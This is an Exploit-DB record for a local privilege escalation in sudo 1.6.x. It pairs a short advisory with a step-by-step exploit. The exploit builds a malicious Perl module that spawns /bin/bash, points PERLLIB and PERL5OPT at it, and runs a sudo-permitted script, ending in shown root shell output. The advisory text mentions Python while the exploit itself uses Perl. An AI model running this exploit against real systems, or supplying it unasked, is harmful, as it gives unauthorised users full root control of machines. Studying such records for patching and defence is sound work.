{"id": "EDB-ID:27056", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "Sudo 1.6.x - Environment Variable Handling Security Bypass (1)", "description": "", "published": "2006-01-09T00:00:00", "modified": "2006-01-09T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/27056", "reporter": "Breno Silva Pinto", "references": [], "cvelist": ["2005-4158"], "immutableFields": [], "lastseen": "2022-08-16T02:36:39", "viewCount": 15, "enchantments": {"dependencies": {}, "score": {"value": 0.2, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.2}, "_state": {"dependencies": 1661190352, "score": 1661184847}, "_internal": {"score_hash": "efc32c3547b259c31aad6ab5fe1ab21a"}, "sourceHref": "https://www.exploit-db.com/download/27056", "sourceData": "source: https://www.securityfocus.com/bid/16184/info\r\n\r\nSudo is prone to a security-bypass vulnerability that could lead to arbitrary code execution. This issue is due to an error in the application when handling environment variables.\r\n\r\nA local attacker with the ability to run Python scripts can exploit this vulnerability to gain access to an interactive Python prompt. That attacker may then execute arbitrary code with elevated privileges, facilitating the complete compromise of affected computers.\r\n\r\nAn attacker must have the ability to run Python scripts through Sudo to exploit this vulnerability.\r\n\r\nThis issue is similar to BID 15394 (Sudo Perl Environment Variable Handling Security Bypass Vulnerability). 
\r\n\r\n## Sudo local root exploit ##\r\n## vuln versions : sudo < 1.6.8p12\r\n## adv : https://www.securityfocus.com/bid/15394\r\n## adv : http://www.frsirt.com/bulletins/2642\r\n\r\n##by breno - breno@kalangolinux.org\r\n\r\n## You need execute access to perl script in sudo ##\r\n\r\n## cat /etc/sudoers ##\r\n\r\nbreno ALL=(ALL) /home/breno/code.pl\r\n\r\n## Now let's create your own perl module FTP.pm :) good name.\r\n\r\nbreno ~ $ -> mkdir modules\r\nbreno ~ $ -> mkdir FTP\r\nbreno ~/modules $ -> ls\r\nFTP\r\nbreno ~/modules $ -> cd FTP\r\nbreno ~/modules/FTP $ -> h2xs -AXc -n FTP\r\nDefaulting to backwards compatibility with perl 5.8.7\r\nIf you intend this module to be compatible with earlier perl versions, please\r\nspecify a minimum perl version with the -b option.\r\n\r\nWriting FTP/lib/FTP.pm\r\nWriting FTP/Makefile.PL\r\nWriting FTP/README\r\nWriting FTP/t/FTP.t\r\nWriting FTP/Changes\r\nWriting FTP/MANIFEST\r\nbreno ~/modules/FTP $ ->\r\n\r\nbreno ~/modules/FTP/FTP $ -> perl Makefile.PL\r\nChecking if your kit is complete...\r\nLooks good\r\nWriting Makefile for FTP\r\nbreno ~/modules/FTP/FTP $ -> make\r\ncp lib/FTP.pm blib/lib/FTP.pm\r\nManifying blib/man3/FTP.3pm\r\nbreno ~/modules/FTP/FTP $ -> make test\r\nPERL_DL_NONLAZY=1 /usr/bin/perl \"-MExtUtils::Command::MM\" \"-e\" \"test_harness(0,\r\n'blib/lib', 'blib/arch')\" t/*.t\r\nt/FTP....ok\r\nAll tests successful.\r\nFiles=1, Tests=1, 0 wallclock secs ( 0.03 cusr + 0.01 csys = 0.04 CPU)\r\nbreno ~/modules/FTP/FTP $ ->\r\n\r\n#Now i deleted the default FTP.pm (it was ugly), and create my beautiful module\r\n\r\nbreno ~/modules/FTP/FTP/blib/lib $ -> vi FTP.pm\r\n\r\npackage FTP;\r\n\r\nuse strict;\r\nuse vars qw($VERSION);\r\n$VERSION = '0.01';\r\n\r\nsub new {\r\n my $package = shift;\r\n return bless({}, $package);\r\n}\r\n\r\nsub verbose {\r\n my $self = shift;\r\n system(\"/bin/bash\");\r\n if (@_) {\r\n $self->{'verbose'} = shift;\r\n }\r\n return $self->{'verbose'};\r\n}\r\n\r\nsub hoot {\r\n my 
$self = shift;\r\n return \"Don't pollute!\" if $self->{'verbose'};\r\n return;\r\n}\r\n\r\n1;\r\n__END__\r\n\r\nEOF\r\n\r\n# Remember our super code.pl\r\n\r\nbreno ~ $ -> vi code.pl\r\n\r\n#!/usr/bin/perl\r\n\r\nBEGIN { $| = 1; print \"1..1\\n\"; }\r\nEND {print \"not ok 1\\n\" unless $loaded;}\r\nuse FTP;\r\n$loaded = 1;\r\nprint \"ok 1\\n\";\r\n\r\nmy $obj = new FTP;\r\n$obj->verbose(1);\r\nmy $result = $obj->hoot;\r\nprint ($result eq \"Don't pollute!\" ? \"ok 2\\n\" : \"not ok 2\\n\");\r\n\r\n$obj->verbose(0);\r\nmy $result = $obj->hoot;\r\nprint ($result eq \"\" ? \"ok 3\\n\" : \"not ok 3\\n\");\r\n\r\n\r\nEOF\r\n\r\n\r\n# Now let's play with PERLLIB and PERL5OPT env.\r\n\r\nbreno ~ $ -> export PERLLIB=\"/home/breno/modules/FTP/FTP/blib/lib/\"\r\nbreno ~ $ -> export PERL5OPT=\"-MFTP\"\r\n\r\n# Now get Root!! :)\r\n\r\nbreno ~ $ -> sudo ./code.pl\r\nPassword:\r\n1..1\r\nok 1\r\nroot ~ # -> id\r\nuid=0(root) gid=0(root) grupos=0(root)\r\nroot ~ # ->", "osvdbidlist": ["20764"], "exploitType": "local", "verified": true}
{}